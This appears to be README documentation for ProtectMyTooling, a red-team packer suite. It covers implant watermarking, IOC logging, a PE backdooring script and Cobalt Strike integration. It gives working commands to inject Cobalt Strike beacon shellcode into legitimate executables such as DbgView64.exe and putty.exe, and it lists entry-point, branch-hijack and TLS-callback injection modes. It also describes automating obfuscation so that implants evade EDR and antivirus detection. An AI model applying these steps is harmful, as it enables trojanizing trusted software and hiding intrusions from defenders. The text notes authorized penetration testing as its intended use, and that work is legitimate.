E###; L###j G##i,,G##, t#E ,WW; E#f,t#Wi,,,.D#L ###K: E#t G##i,,G##, E#f,t#Wi,,E#t jD ,WW; E#f,t#Wi,,,
E#K: L#W; :K#K: L##, t#E .D#; E#t ;#W: :K#t ##D. E#t :K#K: L##, E#t ;#W: j#t .D#; E#t ;#W:
EG LE. ;##D. L##, fE tt DWi ,KK:... #G .. ;##D. L##, DWi ,KK: ,; tt DWi ,KK:
; ;@ ,,, .,, : j ,,, .,,

Watermark thy implants, track them in VirusTotal
Mariusz Banach / mgeeky '22, (@mariuszbit)
<[email protected]>

usage: RedWatermarker.py [options] <infile>

-h, --help show this help message and exit

Required arguments:
infile Input implant file

Optional arguments:
-C, --check Do not actually inject watermark. Check input file if it contains specified watermarks.
-v, --verbose Verbose mode.
-d, --debug Debug mode.
-o PATH, --outfile PATH
Path where to save output file with watermark injected. If not given, will modify infile.

PE Executables Watermarking:
-t STR, --dos-stub STR
Insert watermark into PE DOS Stub (Th is program cannot be run...).
-c NUM, --checksum NUM
Preset PE checksum with this value (4 bytes). Must be number. Can start with 0x for hex value.
-e STR, --overlay STR
Append watermark to the file's Overlay (at the end of the file).
-s NAME,STR, --section NAME,STR
Append a new PE section named NAME and insert watermark there. Section name must be shorter than 8 characters. Section will be marked Read-Only, non-executable.

Currently only PE files watermarking is supported, but in the future Office documents and other formats are to be added as well.

IOCs Collection

IOCs may be collected by simply using -i option in ProtectMyTooling run.

They're being collected at the following phases:

  • on the input file
  • after each obfuscation round on an intermediary file
  • on the final output file

They will contain following fields saved in form of a CSV file:

  • timestamp
  • filename
  • author - formed as [email protected]
  • context - whether a record points to an input, output or intermediary file
  • comment - value adjusted by the user through -I value option
  • md5
  • sha1
  • sha256
  • imphash - PE Imports Hash, if available
  • (TODO) typeref_hash - .NET TypeRef Hash, if available

Resulting will be a CSV file named outfile-ioc.csv stored side by side to generated output artifact. That file is written in APPEND mode, meaning it will receive all subsequent IOCs.

RedBackdoorer - built-in PE Backdooring

ProtectMyTooling utilizes my own RedBackdoorer.py script which provides few methods for backdooring PE executables. Support comes as a dedicated packer named backdoor. Example usage:

Takes Cobalt Strike shellcode on input and encodes with SGN (Shikata Ga-Nai) then backdoors SysInternals DbgView64.exe then produces Amber EXE reflective loader

PS> py ProtectMyTooling.py sgn,backdoor,amber beacon64.bin dbgview64-infected.exe -B dbgview64.exe

::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;;;;;,;;;'````;;;;;;;;
`]]nnn]]' [[[,/[[[' ,[[ \[[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ \[[,[[ \[[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88"888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <[email protected]>

[.] Processing x64 file : beacon64.bin
[>] Generating output of sgn(<file>)...
[>] Generating output of backdoor(sgn(<file>))...
[>] Generating output of Amber(backdoor(sgn(<file>)))...

[+] SUCCEEDED. Original file size: 265959 bytes, new file size Amber(backdoor(sgn(<file>))): 1372672, ratio: 516.12%

Full RedBackdoorer usage:

cmd> py RedBackdoorer.py --help

β–ˆβ–ˆβ–€β–ˆβ–ˆβ–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–„
β–“β–ˆβ–ˆ β–’ β–ˆβ–ˆβ–“β–ˆ β–€β–’β–ˆβ–ˆβ–€ β–ˆβ–ˆβ–Œ
β–“β–ˆβ–ˆ β–‘β–„β–ˆ β–’β–ˆβ–ˆβ–ˆ β–‘β–ˆβ–ˆ β–ˆβ–Œ
β–’β–ˆβ–ˆβ–€β–€β–ˆβ–„ β–’β–“β–ˆ β–„β–‘β–“β–ˆβ–„ β–Œ
β–‘β–ˆβ–ˆβ–“ β–’β–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–“
β–‘ β–’β–“ β–‘β–’β–“β–‘β–‘ β–’β–‘ β–‘β–’β–’β–“ β–’
β–‘β–’ β–‘ β–’β–‘β–‘ β–‘ β–‘β–‘ β–’ β–’
β–‘β–‘ β–‘ β–‘ β–‘ &# 9617; β–‘
β–„β–„β–„β–„ β–„β–„β–„β–‘ β–‘ β–„β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–ˆβ–ˆ β–„β–ˆβ–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–„ β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–€β–ˆβ–ˆβ–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–€β–ˆβ–ˆβ–ˆ
β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–„β–’β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–‘β–’β–ˆβ–ˆβ–€ β–€β–ˆ β–ˆβ–ˆβ–„β–ˆβ–’β–’β–ˆβ–ˆβ–€ β–ˆβ–ˆβ–’β–ˆβ–ˆβ–’ β–ˆβ–ˆβ–’β–ˆβ–ˆβ–’ β–ˆβ–ˆβ–“β–ˆβ–ˆ β–’ β–ˆβ–ˆβ–“β–ˆ β–€β–“β–ˆβ–ˆ β–’ β–ˆβ–ˆβ–’
β–’β–ˆβ–ˆβ–’ β–„β–ˆβ–’β–ˆβ–ˆ β–€β–ˆβ–„ β–’β–“β–ˆ &#9 604;β–“β–ˆβ–ˆβ–ˆβ–„β–‘β–‘β–ˆβ–ˆ β–ˆβ–’β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–“β–ˆβ–ˆ β–‘β–„β–ˆ β–’β–ˆβ–ˆβ–ˆ β–“β–ˆβ–ˆ β–‘β–„β–ˆ β–’
β–’β–ˆβ–ˆβ–‘β–ˆβ–€ β–‘β–ˆβ–ˆβ–„β–„β–„β–„β–ˆβ–ˆβ–’β–“β–“β–„ β–„β–ˆβ–ˆβ–“β–ˆβ–ˆ β–ˆβ–„β–‘β–“β–ˆβ–„ β–’β–ˆβ–ˆ β–ˆβ–ˆβ–’β–ˆβ–ˆ β–ˆβ–ˆβ–’β–ˆβ–ˆβ–€β–€β–ˆβ–„ β–’β–“β–ˆ β–„β–’β–ˆβ–ˆβ–€β–€β–ˆβ–„
β–‘β–“β–ˆ β–€β–ˆβ–“β–“β–ˆ β–“β–ˆβ–ˆβ–’ β–“β–ˆβ–ˆβ–ˆβ–€ β–’β–ˆβ–ˆβ–’ β–ˆβ–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–“β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–“β–’ β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–“β–’β–‘β–ˆβ–ˆβ–“ β–’β–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–‘β–ˆβ–ˆβ–“ β–’β–ˆβ–ˆβ–’
β–‘β–’β–“β–ˆβ–ˆβ–ˆβ–€β–’β–’β–’ β–“β–’β–ˆβ–‘ β–‘β–’ β–’ β–’ β–’β–’ β–“β–’β–’β–’β–“ β–’β–‘ β–’β–‘β–’β–‘β–’β–‘β–‘ β–’β–‘β–’β–‘β–’β–‘β–‘ β–’β–“ β–‘β–’β–“β–‘β–‘ β–’β–‘ β–‘ β–’β–“ β–‘β–’β–“β–‘
β–’β–‘β–’ β–‘ β–’ β–’β–’ β–‘ β–‘ β–’ β–‘ β–‘β–’ β–’β–‘β–‘ β–’ β–’ β–‘ β–’ β–’β–‘ β–‘ β–’ β–’β–‘ β–‘β–’ β–‘ β–’β–‘β–‘ β–‘ β–‘ β–‘β–’ β–‘ β–’β–‘
β–‘ β–‘ β–‘ β–’ &#9 617; β–‘ β–‘β–‘ β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–’ β–‘ β–‘ β–‘ β–’ β–‘β–‘ β–‘ β–‘ β–‘β–‘ β–‘
β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘
β–‘ β–‘ β–‘

Your finest PE backdooring companion.
Mariusz Banach / mgeeky '22, (@mariuszbit)
<[email protected]>

usage: RedBackdoorer.py [options] <mode> <shellcode> <infile>

-h, --help show this help message and exit

Required arguments:
mode PE Injection mode, see help epilog for more details.
shellcode Input shellcode file
infile PE file to backdoor

Optional arguments:
-o PATH, --outfil e PATH
Path where to save output file with watermark injected. If not given, will modify infile.
-v, --verbose Verbose mode.

Backdooring options:
-n NAME, --section-name NAME
If shellcode is to be injected into a new PE section, define that section name. Section name must not be longer than 7 characters. Default: .qcsw
-i IOC, --ioc IOC Append IOC watermark to injected shellcode to facilitate implant tracking.

Authenticode signature options:
-r, --remove-signature
Remove PE Authenticode digital signature since its going to be invalidated anyway.


PE Backdooring <mode> consists of two comma-separated options.
First one denotes where to store shellcode, second how to run it:


| |
| +---------- 1 - change AddressOfEntryPoint
| 2 - hijack branching instruction at Original Entry Point (jmp, call, ...)
| 3 - setup TLS callback
+-------------- 1 - store shellcode in the middle of a code section
2 - append shellcode to the PE file in a new PE section

py RedBackdoorer.py 1,2 beacon.bin putty.exe putty-infected.exe

Cobalt Strike Integration

There is also a script that integrates ProtectMyTooling.py used as a wrapper around configured PE/.NET Packers/Protectors in order to easily transform input executables into their protected and compressed output forms and then upload or use them from within CobaltStrike.

The idea is to have an automated process of protecting all of the uploaded binaries or .NET assemblies used by execute-assembly and forget about protecting or obfuscating them manually before each usage. The added benefit of an automated approach to transform executables is the ability to have the same executable protected each time it's used, resulting in unique samples launched on target machines. That should nicely deceive EDR/AV enterprise-wide IOC sweeps while looking for the same artefact on different machines.

Additionally, the protected-execute-assembly command has the ability to look for assemblies of which only name were given in a preconfigured assemblies directory (set in dotnet_assemblies_directory setting).

To use it:

  1. Load CobaltStrike/ProtectMyTooling.cna in your Cobalt Strike.
  2. Go to the menu and setup all the options

  1. Then in your Beacon's console you'll have following commands available:
  • protected-execute-assembly - Executes a local, previously protected and compressed .NET program in-memory on target.
  • protected-upload - Takes an input file, protects it if its PE executable and then uploads that file to specified remote location.

Basically these commands will open input files, pass the firstly to the CobaltStrike/cobaltProtectMyTooling.py script, which in turn calls out to ProtectMyTooling.py. As soon as the binary gets obfuscated, it will be passed to your beacon for execution/uploading.

Cobalt Strike related Options

Here's a list of options required by the Cobalt Strike integrator:

  • python3_interpreter_path - Specify a path to Python3 interpreter executable
  • protect_my_tooling_dir - Specify a path to ProtectMyTooling main directory
  • protect_my_tooling_config - Specify a path to ProtectMyTooling configuration file with various packers options
  • dotnet_assemblies_directory - Specify local path .NET assemblies should be looked for if not found by execute-assembly
  • cache_protected_executables - Enable to cache already protected executables and reuse them when needed
  • protected_executables_cache_dir - Specify a path to a directory that should store cached protected executables
  • default_exe_x86_packers_chain - Native x86 EXE executables protectors/packers chain
  • default_exe_x64_packers_chain - Native x64 EXE executables protectors/packers chain
  • default_dll_x86_packers_chain - Native x86 DLL executables protectors/packers chain
  • default_dll_x64_packers_chain - Native x64 DLL executables protectors/packers chain
  • default_dotnet_packers_chain - .NET executables protectors/packers chain

Known Issues

  • ScareCrow is very tricky to run from Windows. What worked for me is following:
    1. Run on Windows 10 and have WSL installed (bash.exe command available in Windows)
    2. Have golang installed in WSL at version 1.16+ (tested on 1.18)
    3. Make sure to have PackerScareCrow.Run_ScareCrow_On_Windows_As_WSL = True set

Credits due & used technology

  • All packer, obfuscator, converter, loader credits goes to their authors. This tool is merely a wrapper around their technology!

    • Hopefully none of them mind me adding such wrappers. Should there be concerns - please reach out to me.
  • ProtectMyTooling also uses denim.exe by moloch-- by some Nim-based packers.


  • Write custom PE injector and offer it as a "protector"
  • Add watermarking to other file formats such as Office documents, WSH scripts (VBS, JS, HTA) and containers
  • Add support for a few other Packers/Loaders/Generators in upcoming future:


Use of this tool as well as any other projects I'm author of for illegal purposes, unsolicited hacking, cyber-espionage is strictly prohibited. This and other tools I distribute help professional Penetration Testers, Security Consultants, Security Engineers and other security personnel in improving their customer networks cyber-defence capabilities.
In no event shall the authors or copyright holders be liable for any claim, damages or other liability arising from illegal use of this software.

If there are concerns, copyright issues, threats posed by this software or other inquiries - I am open to collaborate in responsibly addressing them.

The tool exposes handy interface for using mostly open-source or commercially available packers/protectors/obfuscation software, therefore not introducing any immediately new threats to the cyber-security landscape as is.

β˜•Show Supportβ˜•

This and other projects are outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, Consider buying me a coffee (or better a beer) just to say thank you!



   Mariusz Banach / mgeeky, '20-'22
<mb [at] binary-offensive.com>